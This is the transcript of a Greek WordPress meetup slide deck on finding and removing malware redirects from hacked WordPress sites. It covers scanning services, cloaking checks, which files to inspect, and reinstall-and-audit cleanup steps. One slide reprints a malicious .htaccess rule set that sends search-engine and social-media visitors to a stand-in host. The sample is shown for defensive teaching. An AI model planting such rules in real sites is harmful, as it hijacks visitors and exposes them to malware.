Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Μάκης Μουρελάτος - Εντοπισμός και αφαίρεση WordPress malware redirect

WordPress Greek Community
November 01, 2018
Technology
0
650

Μάκης Μουρελάτος - Εντοπισμός και αφαίρεση WordPress malware redirect

WordPress Greek Community

November 01, 2018
Tweet

More Decks by WordPress Greek Community

See All by WordPress Greek Community
Enhancing WordPress and WooCommerce - Case study of ymca.gr
wpgr
0
48
Κατανόηση της καταναλωτικής συμπεριφοράς και διαμόρφωση στρατηγικής
wpgr
0
41
Συνδυαστικές στρατηγικές για Επιτυχημένο E- Commerce, Online Merchandising και Digital Marketing
wpgr
0
55
Ρυθμίσεις & styling μλοκ με χρήση του theme.json
wpgr
0
81
Marketing στην πράξη το 2023
wpgr
1
49
Το Metaverse και πώς σχετίζεται με το WordPress!
wpgr
0
85
Γνωριμία με την ομάδα Training
wpgr
0
20
Στρατηγική SEO content για e-commerce websites
wpgr
1
60
Είμαι Freelancer, πώς να κάνω personal branding
wpgr
0
37

Other Decks in Technology

See All in Technology
Amazon FSx for NetApp ONTAPのパフォーマンスチューニング要素をまとめてみた #cm_odyssey #devio2024
non97
0
220
簡単に始めるSnowflakeの機械学習
nayuts
1
190
Classmethod Odyssey 登壇資料
yamahiro
0
390
ソフトウェアエンジニアリングの知見を活かして データ基盤をいい感じにする on Snowflake [MIERUNE BBQ #10]
mtpooh
2
150
プレイドにおけるDatadog APMの活用方法
plaidtech
PRO
2
120
Git 研修 Advanced【MIXI 24新卒技術研修】
mixi_engineers
PRO
0
200
テスト・設計研修【MIXI 24新卒技術研修】
mixi_engineers
PRO
0
170
ABEMAにおけるLLMを用いたコンテンツベース推薦システム導入と効果検証
cyberagentdevelopers
PRO
1
750
Datadog Cloud SIEMを使ってAWS環境の脅威を可視化した話/lifeistech-datadog-cloud-siem
gidajun
0
480
What if...? 처음부터 다시 LLM 어플리케이션을 개발한다면
huffon
0
1k
AWSでRAGを作る法方
sonoda_mj
1
140
DevIO2024_レガシー運用からの脱却 -クラウド活用の実践事例とベストプラクティス-
jun2882
0
210

Featured

See All Featured
Infographics Made Easy
chrislema
238
18k
What’s in a name? Adding method to the madness
productmarketing
PRO
21
2.9k
Statistics for Hackers
jakevdp
792
220k
The World Runs on Bad Software
bkeepers
PRO
63
11k
Designing for Performance
lara
604
67k
Navigating Team Friction
lara
181
13k
Making the Leap to Tech Lead
cromwellryan
127
8.7k
How to Ace a Technical Interview
jacobian
274
23k
Designing Dashboards & Data Visualisations in Web Apps
destraynor
226
52k
For a Future-Friendly Web
brad_frost
173
9.2k
The Straight Up "How To Draw Better" Workshop
denniskardys
229
130k
Responsive Adventures: Dirty Tricks From The Dark Corners of Front-End
smashingmag
248
20k

Transcript

  1. Gerasimos Mourelatos WordPress Security Aficionado “… there are only two

    types of companies: those that have been hacked and those that will be.” Robert Mueller, FBI Director, 2012 @makismour

  2. 16th WordPress Athens Meetup Εντ οπισμός και Αφαίρεση Malware Redirect

  3. source: internetlivestats.com

  4. FACTS source: codeinwp.com/blog/wordpress-statistics Το WordPress έχει τις περισσότερες παραβιάσεις από

    hackers, αυτό όμως δεν σημαίνει ότι είναι και το πιο ευάλωτο. TimThumb, Revslider & Gravity Forms είναι από τα αγαπημένα plugin όσων θέλουν να παραβιάσουν μια WordPress ιστοσελίδα. Μία από τις πιο συνηθισμένες παραβιάσεις είναι τα malicious ή malware redirects.

  5. MALWARE REDIRECT FIVE Ws Who What Where When Why Ένας

    ή περισσότεροι hacker H WordPress ιστοσελίδα σας κάνει redirect σε μια άλλη -ξένη- ιστοσελίδα .htaccess, theme files, plugin files Όταν εσείς κοιμόσαστε!!! Blackhat SEO, Drive by Download

  6. 1. WORDPRESS WEBSITE SCAN Hosting Provider Quttera Virus Total Web

    Inspector

  7. 2. CLOAKING ΕΛΕΓΧΟΣ ΓΙΑ Fetch Google ΒotSimulator

  8. 3. GOOGLE SITE STATUS ΕΛΕΓΧΟΣ

  9. 4. MALWARE ΕΝΤΟΠΙΣΜΟΣ .htaccess located at root & uploads dir

    wp-config.php theme’s header.php footer.php functions.php

  10. .HTACCESS RewriteEngine On RewriteOptions inherit RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR] RewriteCond

    %{HTTP_REFERER} .*google.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC,OR] RewriteCond %{HTTP_REFERER} .twitter. [OR] RewriteCond %{HTTP_REFERER} .blog. [OR] RewriteCond %{HTTP_REFERER} .live. [OR] RewriteCond %{HTTP_REFERER} .myspace. [OR] RewriteCond %{HTTP_REFERER} .linkedin. [OR] RewriteRule .* http://badsite.co/bad.php?m=123 [R,L]

  11. WP-CONFIG.PHP

  12. THEME'S HEADER.PHP

  13. THEME'S FOOTER.PHP

  14. MALWARE ΑΦΑΙΡΕΣΗ

  15. BACKUP!!!!! Αφαίρεση και εκ νέου εγκατάσταση WordPress Αφαίρεση και εκ

    νέου εγκατάσταση όλων των theme Αφαίρεση και εκ νέου εγκατάσταση όλων των plugin MALWARE ΤΟ ΚΡΥΒΕΤΑΙ ΣΤΙΣ ΛΕΠΤΟΜΕΡΕΙΕΣ

  16. Έλεγχος όλων των admin users Έλεγχος και διαγραφή όλων των

    μη WordPress αρχείων και directory Επανάληψη της διαδικασίας σε όλες της ιστοσελίδες που ανήκουν στον ίδιο hosting account MALWARE ΤΟ ΚΡΥΒΕΤΑΙ ΣΤΙΣ ΛΕΠΤΟΜΕΡΕΙΕΣ

  17. • https://wordpress.org/about/security/ • https://malwaredecoder.com/ • https://quttera.com/ • https://www.virustotal.com • https://app.webinspector.com/

    • https://www.google.com/webmasters/tools/googlebot- fetch • https://transparencyreport.google.com/safe-browsing/ search • https://www.linkedin.com/in/makismour/ USEFUL RESOURCES
  18. None